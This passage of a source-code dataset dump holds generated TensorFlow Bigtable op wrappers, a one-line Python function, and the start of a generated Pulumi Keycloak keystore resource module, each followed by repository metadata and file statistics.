
def bigtable_sample_keys_dataset_eager_fallback(table, name=None, ctx=None):
  r"""Slow-path eager-mode implementation of `bigtable_sample_keys_dataset`."""
  _ctx = ctx if ctx else _context.context()
  table = _ops.convert_to_tensor(table, _dtypes.resource)
  _inputs_flat = [table]
  _attrs = None
  _result = _execute.execute(b"BigtableSampleKeysDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "BigtableSampleKeysDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result

# No Python-level shape function is registered for this op.
_ops.RegisterShape("BigtableSampleKeysDataset")(None)
@tf_export('bigtable_scan_dataset')
def bigtable_scan_dataset(table, prefix, start_key, end_key, column_families, columns, probability, name=None):
  r"""Create the `BigtableScanDataset` op.

  Machine-generated wrapper (original C++ source: bigtable_ops.cc).  In graph
  mode the op is added through the op-def library; in eager mode a C fast
  path is attempted first, falling back to
  `bigtable_scan_dataset_eager_fallback`.

  Args:
    table: A `Tensor` of type `resource`.
    prefix: A `Tensor` of type `string`.
    start_key: A `Tensor` of type `string`.
    end_key: A `Tensor` of type `string`.
    column_families: A `Tensor` of type `string`.
    columns: A `Tensor` of type `string`.
    probability: A `Tensor` of type `float32`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context
  if _ctx is None or not _ctx._eager_context.is_eager:
    # Graph mode: build the op node; this op has no attrs to record.
    _, _, _op = _op_def_lib._apply_op_helper(
        "BigtableScanDataset", table=table, prefix=prefix,
        start_key=start_key, end_key=end_key, column_families=column_families,
        columns=columns, probability=probability, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = None
    _execute.record_gradient(
      "BigtableScanDataset", _inputs_flat, _attrs, _result, name)
    _result, = _result
    return _result
  else:
    try:
      # Eager mode: try the C fast path first.
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._eager_context.device_name,
        "BigtableScanDataset", name, _ctx._post_execution_callbacks, table,
        prefix, start_key, end_key, column_families, columns, probability)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; use the Python slow path.
      return bigtable_scan_dataset_eager_fallback(
          table, prefix, start_key, end_key, column_families, columns,
          probability, name=name, ctx=_ctx)
    except _core._NotOkStatusException as e:
      # Append the op name to the message and re-raise without chaining.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)


def bigtable_scan_dataset_eager_fallback(table, prefix, start_key, end_key, column_families, columns, probability, name=None, ctx=None):
  r"""Slow-path eager-mode implementation of `bigtable_scan_dataset`."""
  _ctx = ctx if ctx else _context.context()
  table = _ops.convert_to_tensor(table, _dtypes.resource)
  prefix = _ops.convert_to_tensor(prefix, _dtypes.string)
  start_key = _ops.convert_to_tensor(start_key, _dtypes.string)
  end_key = _ops.convert_to_tensor(end_key, _dtypes.string)
  column_families = _ops.convert_to_tensor(column_families, _dtypes.string)
  columns = _ops.convert_to_tensor(columns, _dtypes.string)
  probability = _ops.convert_to_tensor(probability, _dtypes.float32)
  _inputs_flat = [table, prefix, start_key, end_key, column_families, columns, probability]
  _attrs = None
  _result = _execute.execute(b"BigtableScanDataset", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "BigtableScanDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result

# No Python-level shape function is registered for this op.
_ops.RegisterShape("BigtableScanDataset")(None)
@tf_export('bigtable_table')
def bigtable_table(client, table_name, container="", shared_name="", name=None):
  r"""Create the `BigtableTable` op, yielding a Bigtable table resource handle.

  Machine-generated wrapper (original C++ source: bigtable_ops.cc).  In graph
  mode the op is added through the op-def library; in eager mode a C fast
  path is attempted first, falling back to
  `bigtable_table_eager_fallback`.

  Args:
    client: A `Tensor` of type `resource`.
    table_name: A `string`.
    container: An optional `string`. Defaults to `""`.
    shared_name: An optional `string`. Defaults to `""`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `resource`.
  """
  _ctx = _context._context
  if _ctx is None or not _ctx._eager_context.is_eager:
    # Graph mode: normalize attr values, then build the op node.
    table_name = _execute.make_str(table_name, "table_name")
    if container is None:
      container = ""
    container = _execute.make_str(container, "container")
    if shared_name is None:
      shared_name = ""
    shared_name = _execute.make_str(shared_name, "shared_name")
    _, _, _op = _op_def_lib._apply_op_helper(
        "BigtableTable", client=client, table_name=table_name,
        container=container, shared_name=shared_name, name=name)
    _result = _op.outputs[:]
    _inputs_flat = _op.inputs
    _attrs = ("table_name", _op.get_attr("table_name"), "container",
              _op.get_attr("container"), "shared_name",
              _op.get_attr("shared_name"))
    _execute.record_gradient(
      "BigtableTable", _inputs_flat, _attrs, _result, name)
    _result, = _result
    return _result
  else:
    try:
      # Eager mode: try the C fast path first; attr names and values are
      # interleaved positionally after the inputs.
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._eager_context.device_name,
        "BigtableTable", name, _ctx._post_execution_callbacks, client,
        "table_name", table_name, "container", container, "shared_name",
        shared_name)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; use the Python slow path.
      return bigtable_table_eager_fallback(
          client, table_name=table_name, container=container,
          shared_name=shared_name, name=name, ctx=_ctx)
    except _core._NotOkStatusException as e:
      # Append the op name to the message and re-raise without chaining.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)


def bigtable_table_eager_fallback(client, table_name, container="", shared_name="", name=None, ctx=None):
  r"""Slow-path eager-mode implementation of `bigtable_table`."""
  _ctx = ctx if ctx else _context.context()
  table_name = _execute.make_str(table_name, "table_name")
  if container is None:
    container = ""
  container = _execute.make_str(container, "container")
  if shared_name is None:
    shared_name = ""
  shared_name = _execute.make_str(shared_name, "shared_name")
  client = _ops.convert_to_tensor(client, _dtypes.resource)
  _inputs_flat = [client]
  _attrs = ("table_name", table_name, "container", container, "shared_name",
  shared_name)
  _result = _execute.execute(b"BigtableTable", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=_ctx, name=name)
  _execute.record_gradient(
      "BigtableTable", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result

# No Python-level shape function is registered for this op.
_ops.RegisterShape("BigtableTable")(None)
@tf_export('dataset_to_bigtable')
def dataset_to_bigtable(table, input_dataset, column_families, columns, timestamp, name=None):
  r"""Create the `DatasetToBigtable` op (no tensor outputs).

  Machine-generated wrapper (original C++ source: bigtable_ops.cc).  In graph
  mode the op is added through the op-def library and the `Operation` itself
  is returned; in eager mode a C fast path is attempted first, falling back
  to `dataset_to_bigtable_eager_fallback`.

  Args:
    table: A `Tensor` of type `resource`.
    input_dataset: A `Tensor` of type `variant`.
    column_families: A `Tensor` of type `string`.
    columns: A `Tensor` of type `string`.
    timestamp: A `Tensor` of type `int64`.
    name: A name for the operation (optional).

  Returns:
    The created Operation.
  """
  _ctx = _context._context
  if _ctx is None or not _ctx._eager_context.is_eager:
    # Graph mode: build the op node and return the Operation directly.
    _, _, _op = _op_def_lib._apply_op_helper(
        "DatasetToBigtable", table=table, input_dataset=input_dataset,
        column_families=column_families, columns=columns, timestamp=timestamp,
        name=name)
    return _op
    # NOTE(review): generated dead code below — the `return _op` above
    # always exits first.  Kept verbatim because this file is generated.
    _result = None
    return _result
  else:
    try:
      # Eager mode: try the C fast path first.
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._eager_context.device_name,
        "DatasetToBigtable", name, _ctx._post_execution_callbacks, table,
        input_dataset, column_families, columns, timestamp)
      return _result
    except _core._FallbackException:
      # Fast path unavailable; use the Python slow path.
      return dataset_to_bigtable_eager_fallback(
          table, input_dataset, column_families, columns, timestamp,
          name=name, ctx=_ctx)
    except _core._NotOkStatusException as e:
      # Append the op name to the message and re-raise without chaining.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)


def dataset_to_bigtable_eager_fallback(table, input_dataset, column_families, columns, timestamp, name=None, ctx=None):
  r"""Slow-path eager-mode implementation of `dataset_to_bigtable`."""
  _ctx = ctx if ctx else _context.context()
  table = _ops.convert_to_tensor(table, _dtypes.resource)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  column_families = _ops.convert_to_tensor(column_families, _dtypes.string)
  columns = _ops.convert_to_tensor(columns, _dtypes.string)
  timestamp = _ops.convert_to_tensor(timestamp, _dtypes.int64)
  _inputs_flat = [table, input_dataset, column_families, columns, timestamp]
  _attrs = None
  # This op has zero outputs, so the result is always None.
  _result = _execute.execute(b"DatasetToBigtable", 0, inputs=_inputs_flat,
                             attrs=_attrs, ctx=_ctx, name=name)
  _result = None
  return _result

# No Python-level shape function is registered for this op.
_ops.RegisterShape("DatasetToBigtable")(None)
def _InitOpDefLibrary(op_list_proto_bytes):
  """Parse a serialized `OpList` proto, register its ops, and return an
  `OpDefLibrary` populated with them.

  Args:
    op_list_proto_bytes: serialized `OpList` protocol buffer (bytes).

  Returns:
    An `OpDefLibrary` containing every op def from the proto.
  """
  op_list = _op_def_pb2.OpList()
  op_list.ParseFromString(op_list_proto_bytes)
  _op_def_registry.register_op_list(op_list)
  op_def_lib = _op_def_library.OpDefLibrary()
  op_def_lib.add_op_list(op_list)
  return op_def_lib
# op {
# name: "BigtableClient"
# output_arg {
# name: "client"
# type: DT_RESOURCE
# }
# attr {
# name: "project_id"
# type: "string"
# }
# attr {
# name: "instance_id"
# type: "string"
# }
# attr {
# name: "connection_pool_size"
# type: "int"
# }
# attr {
# name: "max_receive_message_size"
# type: "int"
# default_value {
# i: -1
# }
# }
# attr {
# name: "container"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "shared_name"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "BigtableLookupDataset"
# input_arg {
# name: "keys_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "column_families"
# type: DT_STRING
# }
# input_arg {
# name: "columns"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtablePrefixKeyDataset"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "prefix"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtableRangeKeyDataset"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "start_key"
# type: DT_STRING
# }
# input_arg {
# name: "end_key"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtableSampleKeyPairsDataset"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "prefix"
# type: DT_STRING
# }
# input_arg {
# name: "start_key"
# type: DT_STRING
# }
# input_arg {
# name: "end_key"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtableSampleKeysDataset"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtableScanDataset"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "prefix"
# type: DT_STRING
# }
# input_arg {
# name: "start_key"
# type: DT_STRING
# }
# input_arg {
# name: "end_key"
# type: DT_STRING
# }
# input_arg {
# name: "column_families"
# type: DT_STRING
# }
# input_arg {
# name: "columns"
# type: DT_STRING
# }
# input_arg {
# name: "probability"
# type: DT_FLOAT
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "BigtableTable"
# input_arg {
# name: "client"
# type: DT_RESOURCE
# }
# output_arg {
# name: "table"
# type: DT_RESOURCE
# }
# attr {
# name: "table_name"
# type: "string"
# }
# attr {
# name: "container"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "shared_name"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "DatasetToBigtable"
# input_arg {
# name: "table"
# type: DT_RESOURCE
# }
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "column_families"
# type: DT_STRING
# }
# input_arg {
# name: "columns"
# type: DT_STRING
# }
# input_arg {
# name: "timestamp"
# type: DT_INT64
# }
# is_stateful: true
# }
# Serialized OpDef protobuf registry for the Bigtable ops listed in the
# comments above (BigtableClient, Bigtable*Dataset, BigtableTable,
# DatasetToBigtable). NOTE(review): this byte blob is tool-generated and must
# stay byte-for-byte in sync with those op definitions — do not edit by hand.
_op_def_lib = _InitOpDefLibrary(b"\n\313\001\n\016BigtableClient\032\n\n\006client\030\024\"\024\n\nproject_id\022\006string\"\025\n\013instance_id\022\006string\"\033\n\024connection_pool_size\022\003int\",\n\030max_receive_message_size\022\003int\032\013\030\377\377\377\377\377\377\377\377\377\001\"\027\n\tcontainer\022\006string\032\002\022\000\"\031\n\013shared_name\022\006string\032\002\022\000\210\001\001\ne\n\025BigtableLookupDataset\022\020\n\014keys_dataset\030\025\022\t\n\005table\030\024\022\023\n\017column_families\030\007\022\013\n\007columns\030\007\032\n\n\006handle\030\025\210\001\001\n@\n\030BigtablePrefixKeyDataset\022\t\n\005table\030\024\022\n\n\006prefix\030\007\032\n\n\006handle\030\025\210\001\001\nO\n\027BigtableRangeKeyDataset\022\t\n\005table\030\024\022\r\n\tstart_key\030\007\022\013\n\007end_key\030\007\032\n\n\006handle\030\025\210\001\001\na\n\035BigtableSampleKeyPairsDataset\022\t\n\005table\030\024\022\n\n\006prefix\030\007\022\r\n\tstart_key\030\007\022\013\n\007end_key\030\007\032\n\n\006handle\030\025\210\001\001\n5\n\031BigtableSampleKeysDataset\022\t\n\005table\030\024\032\n\n\006handle\030\025\210\001\001\n\212\001\n\023BigtableScanDataset\022\t\n\005table\030\024\022\n\n\006prefix\030\007\022\r\n\tstart_key\030\007\022\013\n\007end_key\030\007\022\023\n\017column_families\030\007\022\013\n\007columns\030\007\022\017\n\013probability\030\001\032\n\n\006handle\030\025\210\001\001\ns\n\rBigtableTable\022\n\n\006client\030\024\032\t\n\005table\030\024\"\024\n\ntable_name\022\006string\"\027\n\tcontainer\022\006string\032\002\022\000\"\031\n\013shared_name\022\006string\032\002\022\000\210\001\001\ne\n\021DatasetToBigtable\022\t\n\005table\030\024\022\021\n\rinput_dataset\030\025\022\023\n\017column_families\030\007\022\013\n\007columns\030\007\022\r\n\ttimestamp\030\t\210\001\001")
| 34.995585 | 1,847 | 0.697723 | 4,065 | 31,706 | 5.062731 | 0.057565 | 0.023324 | 0.015306 | 0.022109 | 0.830661 | 0.791837 | 0.754859 | 0.72483 | 0.705782 | 0.69587 | 0 | 0.029936 | 0.195073 | 31,706 | 905 | 1,848 | 35.034254 | 0.776459 | 0.214817 | 0 | 0.665996 | 1 | 0.006036 | 0.140875 | 0.099774 | 0 | 0 | 0 | 0.009945 | 0 | 1 | 0.038229 | false | 0 | 0.030181 | 0 | 0.144869 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
48635502a06ad262110ba2073e2ad74d2acbf9a0 | 36 | py | Python | src/jotaro.py | harisriguhan-facetagr/jojo | 9db8e599a90ca02f14c881eb88ce196f35d7c500 | [
"MIT"
] | null | null | null | src/jotaro.py | harisriguhan-facetagr/jojo | 9db8e599a90ca02f14c881eb88ce196f35d7c500 | [
"MIT"
] | null | null | null | src/jotaro.py | harisriguhan-facetagr/jojo | 9db8e599a90ca02f14c881eb88ce196f35d7c500 | [
"MIT"
] | null | null | null | def jotaro():
return "yare yare" | 18 | 22 | 0.638889 | 5 | 36 | 4.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 36 | 2 | 22 | 18 | 0.821429 | 0 | 0 | 0 | 0 | 0 | 0.243243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
6f97d9e84aacbeedb0fb85c2706ebb829b222067 | 23,940 | py | Python | sdk/python/pulumi_keycloak/realm_keystore_java_generated.py | davide-talesco/pulumi-keycloak | 08d66be6f2bf578d4292e29eb6181794375bc4e5 | [
"ECL-2.0",
"Apache-2.0"
] | 13 | 2020-04-28T15:20:56.000Z | 2022-03-24T18:00:17.000Z | sdk/python/pulumi_keycloak/realm_keystore_java_generated.py | davide-talesco/pulumi-keycloak | 08d66be6f2bf578d4292e29eb6181794375bc4e5 | [
"ECL-2.0",
"Apache-2.0"
] | 49 | 2020-02-06T17:53:35.000Z | 2022-03-25T19:36:08.000Z | sdk/python/pulumi_keycloak/realm_keystore_java_generated.py | davide-talesco/pulumi-keycloak | 08d66be6f2bf578d4292e29eb6181794375bc4e5 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-06-09T01:08:56.000Z | 2021-12-07T15:30:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['RealmKeystoreJavaGeneratedArgs', 'RealmKeystoreJavaGenerated']
@pulumi.input_type
class RealmKeystoreJavaGeneratedArgs:
    """Typed constructor-input bag for `RealmKeystoreJavaGenerated`.

    Generated by the Pulumi Terraform Bridge (tfgen); the `@pulumi.input_type`
    decorator discovers the property getters/setters below, so the structure
    must not be edited by hand. Required inputs: key_alias, key_password,
    keystore, keystore_password, realm_id.
    """
    def __init__(__self__, *,
                 key_alias: pulumi.Input[str],
                 key_password: pulumi.Input[str],
                 keystore: pulumi.Input[str],
                 keystore_password: pulumi.Input[str],
                 realm_id: pulumi.Input[str],
                 active: Optional[pulumi.Input[bool]] = None,
                 algorithm: Optional[pulumi.Input[str]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 priority: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a RealmKeystoreJavaGenerated resource.
        :param pulumi.Input[str] key_alias: Alias for the private key
        :param pulumi.Input[str] key_password: Password for the private key
        :param pulumi.Input[str] keystore: Path to keys file on keycloak instance.
        :param pulumi.Input[str] keystore_password: Password for the private key.
        :param pulumi.Input[str] realm_id: The realm this keystore exists in.
        :param pulumi.Input[bool] active: When `false`, key is not used for signing. Defaults to `true`.
        :param pulumi.Input[str] algorithm: Intended algorithm for the key. Defaults to `RS256`
        :param pulumi.Input[bool] enabled: When `false`, key is not accessible in this realm. Defaults to `true`.
        :param pulumi.Input[str] name: Display name of provider when linked in admin console.
        :param pulumi.Input[int] priority: Priority for the provider. Defaults to `0`
        """
        # Required inputs are always stored; optional ones only when supplied,
        # so unset values stay absent rather than becoming explicit Nones.
        pulumi.set(__self__, "key_alias", key_alias)
        pulumi.set(__self__, "key_password", key_password)
        pulumi.set(__self__, "keystore", keystore)
        pulumi.set(__self__, "keystore_password", keystore_password)
        pulumi.set(__self__, "realm_id", realm_id)
        if active is not None:
            pulumi.set(__self__, "active", active)
        if algorithm is not None:
            pulumi.set(__self__, "algorithm", algorithm)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if priority is not None:
            pulumi.set(__self__, "priority", priority)
    @property
    @pulumi.getter(name="keyAlias")
    def key_alias(self) -> pulumi.Input[str]:
        """
        Alias for the private key
        """
        return pulumi.get(self, "key_alias")
    @key_alias.setter
    def key_alias(self, value: pulumi.Input[str]):
        pulumi.set(self, "key_alias", value)
    @property
    @pulumi.getter(name="keyPassword")
    def key_password(self) -> pulumi.Input[str]:
        """
        Password for the private key
        """
        return pulumi.get(self, "key_password")
    @key_password.setter
    def key_password(self, value: pulumi.Input[str]):
        pulumi.set(self, "key_password", value)
    @property
    @pulumi.getter
    def keystore(self) -> pulumi.Input[str]:
        """
        Path to keys file on keycloak instance.
        """
        return pulumi.get(self, "keystore")
    @keystore.setter
    def keystore(self, value: pulumi.Input[str]):
        pulumi.set(self, "keystore", value)
    @property
    @pulumi.getter(name="keystorePassword")
    def keystore_password(self) -> pulumi.Input[str]:
        """
        Password for the private key.
        """
        return pulumi.get(self, "keystore_password")
    @keystore_password.setter
    def keystore_password(self, value: pulumi.Input[str]):
        pulumi.set(self, "keystore_password", value)
    @property
    @pulumi.getter(name="realmId")
    def realm_id(self) -> pulumi.Input[str]:
        """
        The realm this keystore exists in.
        """
        return pulumi.get(self, "realm_id")
    @realm_id.setter
    def realm_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "realm_id", value)
    @property
    @pulumi.getter
    def active(self) -> Optional[pulumi.Input[bool]]:
        """
        When `false`, key is not used for signing. Defaults to `true`.
        """
        return pulumi.get(self, "active")
    @active.setter
    def active(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "active", value)
    @property
    @pulumi.getter
    def algorithm(self) -> Optional[pulumi.Input[str]]:
        """
        Intended algorithm for the key. Defaults to `RS256`
        """
        return pulumi.get(self, "algorithm")
    @algorithm.setter
    def algorithm(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "algorithm", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        When `false`, key is not accessible in this realm. Defaults to `true`.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Display name of provider when linked in admin console.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def priority(self) -> Optional[pulumi.Input[int]]:
        """
        Priority for the provider. Defaults to `0`
        """
        return pulumi.get(self, "priority")
    @priority.setter
    def priority(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "priority", value)
@pulumi.input_type
class _RealmKeystoreJavaGeneratedState:
    """State-lookup input bag for `RealmKeystoreJavaGenerated.get()`.

    Mirrors the Args class but with *every* field optional, since a state
    lookup may filter on any subset of properties. Generated by the Pulumi
    Terraform Bridge (tfgen); do not edit by hand.
    """
    def __init__(__self__, *,
                 active: Optional[pulumi.Input[bool]] = None,
                 algorithm: Optional[pulumi.Input[str]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 key_alias: Optional[pulumi.Input[str]] = None,
                 key_password: Optional[pulumi.Input[str]] = None,
                 keystore: Optional[pulumi.Input[str]] = None,
                 keystore_password: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 priority: Optional[pulumi.Input[int]] = None,
                 realm_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering RealmKeystoreJavaGenerated resources.
        :param pulumi.Input[bool] active: When `false`, key is not used for signing. Defaults to `true`.
        :param pulumi.Input[str] algorithm: Intended algorithm for the key. Defaults to `RS256`
        :param pulumi.Input[bool] enabled: When `false`, key is not accessible in this realm. Defaults to `true`.
        :param pulumi.Input[str] key_alias: Alias for the private key
        :param pulumi.Input[str] key_password: Password for the private key
        :param pulumi.Input[str] keystore: Path to keys file on keycloak instance.
        :param pulumi.Input[str] keystore_password: Password for the private key.
        :param pulumi.Input[str] name: Display name of provider when linked in admin console.
        :param pulumi.Input[int] priority: Priority for the provider. Defaults to `0`
        :param pulumi.Input[str] realm_id: The realm this keystore exists in.
        """
        # Only store values that were actually supplied so unset filters stay absent.
        if active is not None:
            pulumi.set(__self__, "active", active)
        if algorithm is not None:
            pulumi.set(__self__, "algorithm", algorithm)
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if key_alias is not None:
            pulumi.set(__self__, "key_alias", key_alias)
        if key_password is not None:
            pulumi.set(__self__, "key_password", key_password)
        if keystore is not None:
            pulumi.set(__self__, "keystore", keystore)
        if keystore_password is not None:
            pulumi.set(__self__, "keystore_password", keystore_password)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if priority is not None:
            pulumi.set(__self__, "priority", priority)
        if realm_id is not None:
            pulumi.set(__self__, "realm_id", realm_id)
    @property
    @pulumi.getter
    def active(self) -> Optional[pulumi.Input[bool]]:
        """
        When `false`, key is not used for signing. Defaults to `true`.
        """
        return pulumi.get(self, "active")
    @active.setter
    def active(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "active", value)
    @property
    @pulumi.getter
    def algorithm(self) -> Optional[pulumi.Input[str]]:
        """
        Intended algorithm for the key. Defaults to `RS256`
        """
        return pulumi.get(self, "algorithm")
    @algorithm.setter
    def algorithm(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "algorithm", value)
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        When `false`, key is not accessible in this realm. Defaults to `true`.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter(name="keyAlias")
    def key_alias(self) -> Optional[pulumi.Input[str]]:
        """
        Alias for the private key
        """
        return pulumi.get(self, "key_alias")
    @key_alias.setter
    def key_alias(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key_alias", value)
    @property
    @pulumi.getter(name="keyPassword")
    def key_password(self) -> Optional[pulumi.Input[str]]:
        """
        Password for the private key
        """
        return pulumi.get(self, "key_password")
    @key_password.setter
    def key_password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key_password", value)
    @property
    @pulumi.getter
    def keystore(self) -> Optional[pulumi.Input[str]]:
        """
        Path to keys file on keycloak instance.
        """
        return pulumi.get(self, "keystore")
    @keystore.setter
    def keystore(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "keystore", value)
    @property
    @pulumi.getter(name="keystorePassword")
    def keystore_password(self) -> Optional[pulumi.Input[str]]:
        """
        Password for the private key.
        """
        return pulumi.get(self, "keystore_password")
    @keystore_password.setter
    def keystore_password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "keystore_password", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Display name of provider when linked in admin console.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def priority(self) -> Optional[pulumi.Input[int]]:
        """
        Priority for the provider. Defaults to `0`
        """
        return pulumi.get(self, "priority")
    @priority.setter
    def priority(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "priority", value)
    @property
    @pulumi.getter(name="realmId")
    def realm_id(self) -> Optional[pulumi.Input[str]]:
        """
        The realm this keystore exists in.
        """
        return pulumi.get(self, "realm_id")
    @realm_id.setter
    def realm_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "realm_id", value)
class RealmKeystoreJavaGenerated(pulumi.CustomResource):
    """Pulumi resource for a Keycloak `java-keystore` realm keystore.

    Generated by the Pulumi Terraform Bridge (tfgen); do not edit by hand.
    Construction dispatches through `__init__` to `_internal_init`, accepting
    either a `RealmKeystoreJavaGeneratedArgs` bag or individual keyword args.
    """
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 active: Optional[pulumi.Input[bool]] = None,
                 algorithm: Optional[pulumi.Input[str]] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 key_alias: Optional[pulumi.Input[str]] = None,
                 key_password: Optional[pulumi.Input[str]] = None,
                 keystore: Optional[pulumi.Input[str]] = None,
                 keystore_password: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 priority: Optional[pulumi.Input[int]] = None,
                 realm_id: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Allows for creating and managing `java-keystore` Realm keystores within Keycloak.
        A realm keystore manages generated key pairs that are used by Keycloak to perform cryptographic signatures and encryption.
        ## Import
        Realm keys can be imported using realm name and keystore id, you can find it in web UI. Example:
        ```sh
        $ pulumi import keycloak:index/realmKeystoreJavaGenerated:RealmKeystoreJavaGenerated java_keystore my-realm/my-realm/618cfba7-49aa-4c09-9a19-2f699b576f0b
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] active: When `false`, key is not used for signing. Defaults to `true`.
        :param pulumi.Input[str] algorithm: Intended algorithm for the key. Defaults to `RS256`
        :param pulumi.Input[bool] enabled: When `false`, key is not accessible in this realm. Defaults to `true`.
        :param pulumi.Input[str] key_alias: Alias for the private key
        :param pulumi.Input[str] key_password: Password for the private key
        :param pulumi.Input[str] keystore: Path to keys file on keycloak instance.
